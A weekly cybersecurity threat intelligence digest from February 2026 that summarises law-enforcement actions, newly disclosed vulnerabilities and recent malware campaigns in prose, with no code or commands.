Cyware Weekly Threat Intelligence, February 16–20, 2026
The Good
INTERPOL's Operation Red Card 2.0 led to 651 arrests across 16 African countries, recovering over $4.3 million from online scams. It targeted high-yield investment scams, mobile money fraud, and fake loan applications. The operation uncovered schemes tied to over $45 million in losses, dismantled 1,442 malicious IPs, domains, and servers, and seized 2,341 devices. In Nigeria, a major investment fraud ring using phishing and fake crypto schemes was dismantled, shutting down over 1,000 social media accounts. Kenya arrested 27 suspects linked to fake investment offers, and Côte d’Ivoire detained 58 individuals tied to mobile loan scams.
The Bad
A wide-open digital door has been discovered in several Honeywell CCTV products, where a critical "no-authentication" flaw allows remote account hijacking. A massive security blind spot has been revealed in the VSCode ecosystem, where vulnerabilities in extensions like Code Runner and Live Preview have put millions of developers at risk. A malicious clone of the legitimate Triton macOS client has surfaced on GitHub, proving that even "open-source" isn't always open-and-shut.
A critical vulnerability, tracked as CVE-2026-1670, has been identified in multiple Honeywell CCTV products, allowing unauthorized access to camera feeds and potential account hijacking. Discovered by researcher Souvik Kanda, this flaw is classified as "missing authentication for critical function" and has a severity score of 9.8. It enables unauthenticated attackers to change the recovery email address associated with device accounts through an exposed API endpoint, facilitating account takeover. Affected models include several Honeywell CCTV cameras used in small to medium business environments and critical infrastructure settings. Although there have been no reported public exploitation of this vulnerability as of February 17, CISA has issued a warning to raise awareness.
Security researchers have documented a significant shift in the infostealer landscape with the first live attack targeting OpenClaw, an AI assistant known for its insecure default settings and plaintext storage of sensitive data. The infostealer employed a comprehensive file-grabbing routine, capturing critical files such as openclaw.json and device.json, which contained users' email addresses, cryptographic keys, and sensitive logs. This information allows attackers to impersonate users, bypass security checks, and gain unauthorized access to local OpenClaw instances.
Recent vulnerabilities in widely used VSCode extensions, collectively downloaded over 128 million times, pose significant security risks to developers. Flaws affecting extensions like Code Runner, Markdown Preview Enhanced, and Microsoft Live Preview could be exploited to steal local files and execute code remotely. Researchers identified these issues, including a critical vulnerability in the Live Server extension that allows file theft through malicious webpages. Additionally, the Code Runner vulnerability enables remote code execution via configuration changes. The Markdown Preview Enhanced extension is susceptible to executing JavaScript through crafted Markdown files. Despite attempts to notify maintainers since June 2025, no responses were received, leaving developers exposed to potential attacks that could lead to data exfiltration and system takeovers.
A Chinese state-backed hacking group, known as UNC6201, has been exploiting a critical zero-day vulnerability (CVE-2026-22769) in Dell RecoverPoint for Virtual Machines since mid-2024. This vulnerability, caused by hardcoded credentials, allows unauthorized remote access, enabling attackers to gain root-level persistence on affected systems. Once inside the network, UNC6201 deployed various malware, including a newly identified backdoor called Grimbolt, which is designed to be faster and harder to analyze than its predecessor, Brickstorm. The group has also employed advanced techniques, such as creating hidden network interfaces, referred to as "Ghost NICs," on VMware ESXi servers to navigate stealthily within victims' networks. Researchers have noted overlaps between UNC6201 and another Chinese threat cluster, UNC5221, which has targeted U.S. organizations in various sectors.
A malicious fork of the legitimate Triton macOS client for omg.lol has been discovered on GitHub, serving as a delivery mechanism for Windows malware. The attackers cloned the original project, rebranding it under the account “JaoAureliano” and embedding a trojanized ZIP file named Software_3.1.zip within misleading README content. This deceptive repository pressures users to download the malicious file while masking its true purpose. Despite appearing as a legitimate macOS application, the malware is designed for Windows systems and employs anti-analysis techniques to evade detection.
A previously undocumented threat actor, potentially linked to Russian intelligence, has been attributed to malware attacks targeting Ukrainian organizations, particularly in defense, military, government, and energy sectors. This group has also shown interest in aerospace and manufacturing companies connected to military operations, as well as humanitarian organizations in Ukraine. Utilizing LLMs, the actor conducts reconnaissance and social engineering, enhancing their technical capabilities. Recent phishing campaigns involved impersonating legitimate Ukrainian energy entities and embedding CANFAIL malware within RAR archives disguised as PDF files. The CANFAIL malware executes a PowerShell script that downloads additional malicious components while displaying a fake error message to victims. This threat actor is also connected to the PhantomCaptcha campaign, which targets organizations involved in Ukraine's war relief efforts through deceptive phishing tactics.
New Threats
The CRESCENTHARVEST campaign weaponizes geopolitical tension by disguising data-stealing malware as urgent media files related to the ongoing protests in Iran. A new breed of cryptojacking is bypassing the browser to strike at the heart of the operating system by hiding within pirated software installers. The China-linked Iron Tiger (APT27) has ported its custom SysUpdate malware to Linux, disguising it as a persistent system service to maintain a silent foothold.
Cybersecurity researchers have uncovered a campaign named CRESCENTHARVEST, which appears to target supporters of the ongoing protests in Iran. This operation utilizes RAT to facilitate information theft and long-term espionage. The attackers exploit recent geopolitical events to lure victims into opening malicious files disguised as protest-related images or videos. These files are bundled with authentic media and a Farsi-language report, enhancing their credibility. The attack begins with a malicious RAR archive that contains deceptive Windows shortcut files, which, when executed, deploy PowerShell code to retrieve additional malware. This malware extracts sensitive data, including browser credentials and system information, while communicating with a C2 server.
A newly discovered cryptojacking campaign exploits pirated software installers to facilitate a multi-stage infection aimed at maximizing Monero mining. This operation employs a customized XMRig miner and a controller component that ensures persistent access to infected systems. Unlike previous browser-based schemes, this campaign utilizes system-level malware, disguising itself as legitimate office productivity software to lure unsuspecting users. Once activated, the malware installs a primary controller named Explorer.exe, which orchestrates various functions based on command-line inputs, allowing it to install or remove components as needed. Notably, the campaign leverages a vulnerable signed driver, WinRing0x64.sys, to gain kernel-level access, enhancing mining performance significantly.
A new SmartLoader campaign has emerged, utilizing a trojanized version of the Oura MCP server to deploy the StealC infostealer. Cybercriminals cloned the legitimate Oura MCP server, which connects AI assistants to health data, and constructed a deceptive network of fake GitHub accounts and repositories to establish credibility. This method allowed them to distribute a malicious payload disguised as a legitimate server. Once downloaded, the trojan executes an obfuscated Lua script that installs SmartLoader, which subsequently deploys StealC to steal sensitive information such as credentials and cryptocurrency wallet data.
A new variant of SysUpdate malware, linked to the APT27/Iron Tiger group, has been identified targeting Linux systems. Initially detected on a client’s machine, this malware functions as a system service and executes commands like the GNU/Linux id command. It is a packed ELF64 binary, dynamically linked, and employs an unknown obfuscated packer, complicating static analysis. The malware communicates with its command-and-control servers using encrypted traffic across multiple protocols. Researchers revealed that the malware's encryption routines are complex and require emulation to decrypt C2 traffic.
OysterLoader, a multi-stage malware loader, has significantly evolved in early 2026, enhancing its C2 infrastructure and obfuscation methods. Initially reported in June 2024, this C++-based threat is linked to the Rhysida ransomware group and is often distributed through fraudulent websites that impersonate legitimate IT tools like PuTTY and WinSCP. The malware's infection process unfolds in four distinct stages, utilizing sophisticated techniques to evade detection. It employs a custom LZMA decompression routine and dynamic API resolution, complicating static analysis. Recent updates to its C2 protocol feature a three-step communication process, with encoded JSON communications that use a non-standard Base64 alphabet, further obscuring its traffic.
A new variant of the ClickFix attack utilizes DNS queries to deliver malicious PowerShell payloads, marking a significant evolution in social engineering tactics. Victims are tricked into executing a custom `nslookup` command that queries an attacker-controlled DNS server. This command returns a response containing a PowerShell script, which is executed on the victim's device to install malware. The attack subsequently downloads additional malicious components, including a remote access trojan known as ModeloRAT, allowing attackers to control compromised systems. Unlike previous ClickFix methods that relied on HTTP for payload delivery, this technique blends in with normal DNS traffic, enabling attackers to modify payloads dynamically.